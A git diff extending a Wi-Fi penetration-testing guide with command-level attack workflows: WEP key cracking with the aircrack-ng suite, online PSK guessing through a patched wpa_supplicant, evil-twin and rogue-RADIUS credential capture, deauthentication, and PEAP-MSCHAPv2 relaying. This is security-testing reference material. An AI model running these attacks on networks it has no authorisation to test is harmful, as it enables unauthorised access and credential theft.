diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 3320e44ede3..9cf7c7f0402 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically: - **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks - **+ WPA** -- Useful to capture WPA handshakes +## Open / OWE networks quick notes + +- **Passive capture** on open SSIDs still works with monitor mode and tcpdump: + +```bash +iw wlan0 set type monitor +ip link set wlan0 up +iw wlan0 set channel 6 +tcpdump -i wlan0 -w capture.pcap +``` + +- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames. +- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works. +- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained. +- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See: + +{{#ref}} +../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +{{#endref}} + ## DOS ### Deauthentication Packets @@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_ ## **WEP** -So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options. +**Why it collapses** + +- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream. +- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions. +- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs. + +Practical break is deterministic: + +```bash +airodump-ng --bssid --channel --write wep_capture wlan1mon # collect IVs +# optionally speed up IVs without deauth by replaying ARP +aireplay-ng --arpreplay -b -h wlan1mon +aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met +``` + +Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI. ![](<../../images/image (432).png>) @@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali pyrit -r psk-01.cap analyze ``` +#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID) + +When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants: + +- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer. +- Run a single daemon with a control socket: + +```bash +# wpa_supplicant.conf +ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root +update_config=1 + +wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf +``` + +- Drive it via the control interface, reusing the same scan and network: + +```text +ADD_NETWORK +SET_NETWORK 0 ssid "" +ENABLE_NETWORK 0 +SCAN +(loop) + SET_NETWORK 0 psk "" + REASSOCIATE + wait for CTRL-EVENT-CONNECTED / DISCONNECTED +``` + +A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays. + ## **WPA Enterprise (MGT)** In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include: @@ -714,6 +779,16 @@ Or you could also use: - `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect). - [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/) +#### When clients skip RADIUS certificate validation (PEAP/TTLS) + +- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth `) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth. +- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext. + +#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana) + +- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password. +- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations. + **Using Airgeddon** `Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\ @@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti - [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/) - [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186) - [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/) +- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html) +- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/) TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)